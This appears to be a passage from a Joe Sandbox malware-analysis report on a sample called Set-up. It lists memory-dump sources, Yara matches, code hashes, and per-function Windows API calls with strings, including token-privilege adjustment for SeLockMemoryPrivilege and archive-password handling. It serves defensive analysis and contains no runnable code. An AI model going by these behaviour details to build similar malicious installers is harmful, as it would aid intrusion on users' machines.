                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fed09b0d69ae8670bffb1ce512949934e23b7a7dedbf840ec152555a1c73a694
                                                                                                                                                  • Instruction ID: 35de027e0e72b09b75cd4cbeb2561408b356d976d9c8403aac3948886f6af61a
                                                                                                                                                  • Opcode Fuzzy Hash: fed09b0d69ae8670bffb1ce512949934e23b7a7dedbf840ec152555a1c73a694
                                                                                                                                                  • Instruction Fuzzy Hash: DE01255519628989DB81DA7DC450349FF80F756302F9CC3E4E0C8CFB42D98DC54AC361
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cc1dcb69a63aa371f098c01b2a7e536de66d5cb4f042aa4282ad09bf1844d201
                                                                                                                                                  • Instruction ID: 6e5e33b6a9d3f1d8857274456110f283c94b45f55267e8cf222ddfff65fab1b9
                                                                                                                                                  • Opcode Fuzzy Hash: cc1dcb69a63aa371f098c01b2a7e536de66d5cb4f042aa4282ad09bf1844d201
                                                                                                                                                  • Instruction Fuzzy Hash: 2B01D6314087418EC328DF14D855AAEFBE1EFE2314F55496CE4D59B2A5EB30CA45CB87
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dbc1bc5d8d65a7788a22de20b240bab952169e4f9fe71443183cc073e45fb36b
                                                                                                                                                  • Instruction ID: 3ff5a1d14cef918c963bcfc3a284bddf6c0808bc9534f74429667b0c63bd1bc5
                                                                                                                                                  • Opcode Fuzzy Hash: dbc1bc5d8d65a7788a22de20b240bab952169e4f9fe71443183cc073e45fb36b
                                                                                                                                                  • Instruction Fuzzy Hash: 6901FD34A09A01EBDF1D8F14A54047AB3A6FB92730F20516CE18363651C371ED06CF9E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 63327b2e0858169d7123a7c0bc6f5f9e2855f87f6fbfcaebba12d6f36b766746
                                                                                                                                                  • Instruction ID: 9d674b0043d517b63cd877289b2f86f60dd99c5da073a11adcc3037492e9434e
                                                                                                                                                  • Opcode Fuzzy Hash: 63327b2e0858169d7123a7c0bc6f5f9e2855f87f6fbfcaebba12d6f36b766746
                                                                                                                                                  • Instruction Fuzzy Hash: CAF027625181514F8B149F1884D02BAB3730EE7310B58C369D1D19735AC931C556CB68
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                  • Instruction ID: b14562a8783ce41d99966d475792855304adfca29eda5f8d5931258c6d29f1d8
                                                                                                                                                  • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                  • Instruction Fuzzy Hash: 2501CD34A11108EFDB54EF94C194A9EF7B6FF48311F208A99D8055B391D770AF56DB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2a2d9cac2c7f910bd9b39b4b49070a989c4dbfadd042d0f7f3ae3726c368da9a
                                                                                                                                                  • Instruction ID: dbc615352e9efbf172ecc8ba2f2a504ac6876547a1afda569e993798811abf58
                                                                                                                                                  • Opcode Fuzzy Hash: 2a2d9cac2c7f910bd9b39b4b49070a989c4dbfadd042d0f7f3ae3726c368da9a
                                                                                                                                                  • Instruction Fuzzy Hash: 04C04CE994F0808B9544DB18AC5253572299A57204B183438E40BD7352D611E515CA5E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 32a61ffe8294ae8e3481f9a87309bd85391c56d7fe2f648cf150b77a244fa995
                                                                                                                                                  • Instruction ID: b95b1213245d927c69f684149952510929cb8562e670bee94ddb7b8263dc6dab
                                                                                                                                                  • Opcode Fuzzy Hash: 32a61ffe8294ae8e3481f9a87309bd85391c56d7fe2f648cf150b77a244fa995
                                                                                                                                                  • Instruction Fuzzy Hash: AFB011E0C080808B8800AF20A88283AA238820B300F083828E00AE3203E200E800AA2E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d803f991a0724a844ad44556645a3331b5999ac08049c09205cb5f8298990558
                                                                                                                                                  • Instruction ID: b766038e46f1a7269febff52073cf5f0fd17543b8df62e16fa2f7736b757c252
                                                                                                                                                  • Opcode Fuzzy Hash: d803f991a0724a844ad44556645a3331b5999ac08049c09205cb5f8298990558
                                                                                                                                                  • Instruction Fuzzy Hash: A8B012D0C09440438440AF105801475E1784647200F043420D009A3103D200D504865E
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00410693
                                                                                                                                                  • OpenFileMappingA.KERNEL32(00000004,00000000,00000000), ref: 0041073E
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041074F
                                                                                                                                                  • MapViewOfFile.KERNEL32(00000002,00000004,00000000,00000000,00000000,?), ref: 0041077B
                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000003), ref: 0041081C
                                                                                                                                                  • CloseHandle.KERNEL32(00000002), ref: 0041082A
                                                                                                                                                  • OpenEventA.KERNEL32(00000002,00000000,00000000), ref: 00410847
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00410858
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ErrorLastOpenView$CloseEventH_prologHandleMappingUnmap
                                                                                                                                                  • String ID: Can not open mapping$Incorrect mapping data$MapViewOfFile error$data error
                                                                                                                                                  • API String ID: 3506968402-3547812707
                                                                                                                                                  APIs
                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,0047D0A8,00000001,00000000,00000000,7591E860,00495F44,?,?,?,00471A6E,?,?,?,00000000), ref: 00471C0F
                                                                                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,0047D0A4,00000001,00000000,00000000,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471C2B
                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,00471A6E,?,?,7591E860,00495F44,?,?,?,00471A6E,?,?,?,00000000), ref: 00471C74
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,D_I,?,00471A6E,00000000,00000000,7591E860,00495F44,?,?,?,00471A6E,?,?,?,00000000), ref: 00471CAC
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00471A6E,?,00000000,?,?,00471A6E,?), ref: 00471D04
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00471A6E,?), ref: 00471D1A
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00471A6E,?), ref: 00471D4D
                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00471A6E,?), ref: 00471DB5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: String$ByteCharMultiWide
                                                                                                                                                  • String ID: D_I
                                                                                                                                                  • API String ID: 352835431-3136373921
                                                                                                                                                  • Opcode ID: 6f6a320ebd22060c3fa8a5b53effa347b0c05c668cffeaf4f3b0cc9d26c959d0
                                                                                                                                                  • Instruction ID: 0e2e896c49bff1b1b6807e03d1d0e510b282c7cf32459865d9691b8749b9733f
                                                                                                                                                  • Opcode Fuzzy Hash: 6f6a320ebd22060c3fa8a5b53effa347b0c05c668cffeaf4f3b0cc9d26c959d0
                                                                                                                                                  • Instruction Fuzzy Hash: C851BD31900249EFCF228F99CC44ADF7BB5FB89754F10852AF919A1270C3399A61DF69
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040B013
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 0040B01E
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040B029
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?), ref: 0040B043
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040B088
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040B09E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$CloseCurrentErrorHandleLastProcess
                                                                                                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$OpenProcessToken$SeLockMemoryPrivilege
                                                                                                                                                  • API String ID: 3845410253-2730760130
                                                                                                                                                  • Opcode ID: 0b2cc48c3d3c4d5c062af241b6caa6a0fe5d0f3ac55c0216d33969c7b2eec483
                                                                                                                                                  • Instruction ID: 9de31247217a9212568b4247c2b257bbb6408e476a889291fcd689fac0313941
                                                                                                                                                  • Opcode Fuzzy Hash: 0b2cc48c3d3c4d5c062af241b6caa6a0fe5d0f3ac55c0216d33969c7b2eec483
                                                                                                                                                  • Instruction Fuzzy Hash: 55218E71940329AFDB105BA58C45AFFBBBCEF86B00F048836E511F2281D77D49499BA9
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00409FA5
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409FB0
                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,0040A1D5,00000012,00000000,?,00000003,00000000,?,?), ref: 00409FBB
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A020
                                                                                                                                                  • SetLastError.KERNEL32(000000B7,?,?,?,?,?,0040A1D5,00000012,00000000,?,00000003), ref: 0040A053
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0040A1D5,00000012,00000000,?,00000003), ref: 0040A079
                                                                                                                                                    • Part of subcall function 004094FA: __EH_prolog.LIBCMT ref: 004094FF
                                                                                                                                                    • Part of subcall function 004094FA: CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 00409524
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountCurrentErrorLastTick$CreateDirectoryH_prologProcessThread
                                                                                                                                                  • String ID: .tmp$d
                                                                                                                                                  • API String ID: 43677640-2797371523
                                                                                                                                                  • Opcode ID: 0ab5e57f017d120bc9e5124009a47c42978d37bd9672d801d6d6d35e446eae8e
                                                                                                                                                  • Instruction ID: c4674485ca07991072ace2780f07c034f6046748332ee135b1031fc7861e7e83
                                                                                                                                                  • Opcode Fuzzy Hash: 0ab5e57f017d120bc9e5124009a47c42978d37bd9672d801d6d6d35e446eae8e
                                                                                                                                                  • Instruction Fuzzy Hash: 9631D4316403059BDB209F60C8897AD7360EF96319F14443BE806B72C2D77D4C65CB4A
                                                                                                                                                  APIs
                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,0047D0A8,00000001,?,7591E860,00495F44,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471E5B
                                                                                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,0047D0A4,00000001,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471E75
                                                                                                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,00471A6E,7591E860,00495F44,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471EA9
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,D_I,?,?,00000000,00000000,7591E860,00495F44,?,?,00471A6E,?,?,?,00000000,00000001), ref: 00471EE1
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00471A6E,?), ref: 00471F37
                                                                                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,00471A6E,?,?,?,?,?,?,00471A6E,?), ref: 00471F49
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                                                                                  • String ID: D_I
                                                                                                                                                  • API String ID: 3852931651-3136373921
                                                                                                                                                  • Opcode ID: 2c2c12b03093ff175938c4e4e10ada18cc6c6c4b2bd054ef57623f5d0335fe7a
                                                                                                                                                  • Instruction ID: d0aeff106ebb83d899acd95286ba23b371c644fe91394e7f1cba238427989c8c
                                                                                                                                                  • Opcode Fuzzy Hash: 2c2c12b03093ff175938c4e4e10ada18cc6c6c4b2bd054ef57623f5d0335fe7a
                                                                                                                                                  • Instruction Fuzzy Hash: DF417F72A00149EFCF209F98DC85EEF7B78EB08754F108826F919E2260D3399955CB99
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0047082E
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,0047CFDC,00000000,00000000,00000000,?), ref: 00470904
                                                                                                                                                  • WriteFile.KERNEL32(00000000), ref: 0047090B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                  • API String ID: 3784150691-4022980321
                                                                                                                                                  • Opcode ID: c7c3addc6f2ba0fa178d61ed8d8e6645ffb1b4613aef6de6e596055583288bdd
                                                                                                                                                  • Instruction ID: 21453c154c087cdcd8d4fde53343803305a333df17ae47c7a858c06d4e6d664e
                                                                                                                                                  • Opcode Fuzzy Hash: c7c3addc6f2ba0fa178d61ed8d8e6645ffb1b4613aef6de6e596055583288bdd
                                                                                                                                                  • Instruction Fuzzy Hash: 6D31EA72A01208EFEF20AB64CC46FDE336CEF45344F10446BF54CE6151E6789A858B5E
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040B64B
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040B652
                                                                                                                                                  • GlobalMemoryStatus.KERNEL32(?), ref: 0040B68D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                                                  • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                  • API String ID: 2450578220-802862622
                                                                                                                                                  • Opcode ID: 34ae1ecb10f56048fbf66bb278759217eb6dd1391e151d16168005e3e052f68d
                                                                                                                                                  • Instruction ID: b135d2f3381d44ac480494645a7cd0938dae793d85ba4191ada2bbe6e2a6206e
                                                                                                                                                  • Opcode Fuzzy Hash: 34ae1ecb10f56048fbf66bb278759217eb6dd1391e151d16168005e3e052f68d
                                                                                                                                                  • Instruction Fuzzy Hash: 7F014B70A0020D9BDF00DBE4D89AA9EB7B5FB44348F144D25E401F7294D739E9858B9D
                                                                                                                                                  APIs
                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046D3E9), ref: 00470671
                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046D3E9), ref: 00470685
                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046D3E9), ref: 004706B1
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046D3E9), ref: 004706E9
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046D3E9), ref: 0047070B
                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,0046D3E9), ref: 00470724
                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046D3E9), ref: 00470737
                                                                                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00470775
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1823725401-0
                                                                                                                                                  • Opcode ID: 57e1f377e4aad6a101506f3ab0e42882e70f5c79bee1956c6bff922374264749
                                                                                                                                                  • Instruction ID: 0f1f5a0df5524138eab7177ed600212bcaa543921de78a68761284f1db32d8ec
                                                                                                                                                  • Opcode Fuzzy Hash: 57e1f377e4aad6a101506f3ab0e42882e70f5c79bee1956c6bff922374264749
                                                                                                                                                  • Instruction Fuzzy Hash: F6312872506251EFE7307F745CC48BB769CE695394711453BF54EC3300E629AC918BAE
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0043E023
                                                                                                                                                    • Part of subcall function 004075D4: __EH_prolog.LIBCMT ref: 004075D9
                                                                                                                                                    • Part of subcall function 0040DC92: __EH_prolog.LIBCMT ref: 0040DC97
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: 128$192$256$AES$ZIPCRYPTO
                                                                                                                                                  • API String ID: 3519838083-2504388814
                                                                                                                                                  • Opcode ID: 4674745a697993694f92702d64389e174ce5edcfb624bbc3de701aa153f63644
                                                                                                                                                  • Instruction ID: 32f1e49b2da12fa493474accc6a321bfaad52419f91ef2a02a0c8f5d2ca2b950
                                                                                                                                                  • Opcode Fuzzy Hash: 4674745a697993694f92702d64389e174ce5edcfb624bbc3de701aa153f63644
                                                                                                                                                  • Instruction Fuzzy Hash: 64E1B570D05244DACF11EBA2C441BEEBBB2AF58308F24446FE445772C2DB786E45CB6A
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405F07
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,Enter password (will not be echoed):,?,?), ref: 00405F30
                                                                                                                                                  • GetConsoleMode.KERNEL32(00000000,00000000,?,?), ref: 00405F54
                                                                                                                                                  • SetConsoleMode.KERNEL32(00000000,00000000,?,?), ref: 00405F65
                                                                                                                                                  • SetConsoleMode.KERNEL32(00000000,00000000,?,?,?), ref: 00405F89
                                                                                                                                                  Strings
                                                                                                                                                  • Enter password (will not be echoed):, xrefs: 00405F1B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ConsoleMode$H_prologHandle
                                                                                                                                                  • String ID: Enter password (will not be echoed):
                                                                                                                                                  • API String ID: 2048311603-3720017889
                                                                                                                                                  • Opcode ID: f8cd3e0b57c7b0b044b0da71a7083723b6b607ab9f23dcae3d931d2d2fbc41d5
                                                                                                                                                  • Instruction ID: 5118b2bd0438b802a98943555490a3d0f7b73820210449609ab51453b7f0d9a0
                                                                                                                                                  • Opcode Fuzzy Hash: f8cd3e0b57c7b0b044b0da71a7083723b6b607ab9f23dcae3d931d2d2fbc41d5
                                                                                                                                                  • Instruction Fuzzy Hash: E311A132E001595BDB14EBA58845BEFB7B8DF45315F14057EE401B22D1CB3C5E04CB6A
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405BA9
                                                                                                                                                  • EnterCriticalSection.KERNEL32(004907B8), ref: 00405BBC
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(004907B8), ref: 00405BCD
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(004907B8), ref: 00405C18
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$Leave$EnterH_prolog
                                                                                                                                                  • String ID: Anti item $Compressing
                                                                                                                                                  • API String ID: 2532973370-3992608634
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409184
                                                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 0040919D
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 004091C8
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,00000003,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409207
                                                                                                                                                  • SetFileTime.KERNEL32(000000FF,?,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409229
                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409237
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Create$CloseErrorH_prologHandleLastTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1562325489-0
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0046E0EA: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FAC9,00000009,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046E127
                                                                                                                                                    • Part of subcall function 0046E0EA: EnterCriticalSection.KERNEL32(?,?,?,0046FAC9,00000009,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046E142
                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,00000000,?,?,0046D3F3), ref: 00471331
                                                                                                                                                    • Part of subcall function 0046E14B: LeaveCriticalSection.KERNEL32(?,0046C500,00000009,0046C4EC,00000000,?,00000000,00000000,00000000), ref: 0046E158
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterInfoInitializeLeave
                                                                                                                                                  • String ID: P_I$P_I$``I$``I
                                                                                                                                                  • API String ID: 1866836854-3985449526
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0046E4BD
                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0046E4F2
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0046E552
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                                  • API String ID: 1385375860-4131005785
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: Can not open encrypted archive. Wrong password?$Can not open file as archive$Can't allocate required memory$Error:
                                                                                                                                                  • API String ID: 3519838083-4253456528
                                                                                                                                                  APIs
                                                                                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0046F8B5
                                                                                                                                                  • GetFileType.KERNEL32(00000480), ref: 0046F960
                                                                                                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 0046F9C3
                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 0046F9D1
                                                                                                                                                  • SetHandleCount.KERNEL32 ref: 0046FA08
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1710529072-0
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004094FF
                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 00409543
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 00409524
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,00000000), ref: 0040954D
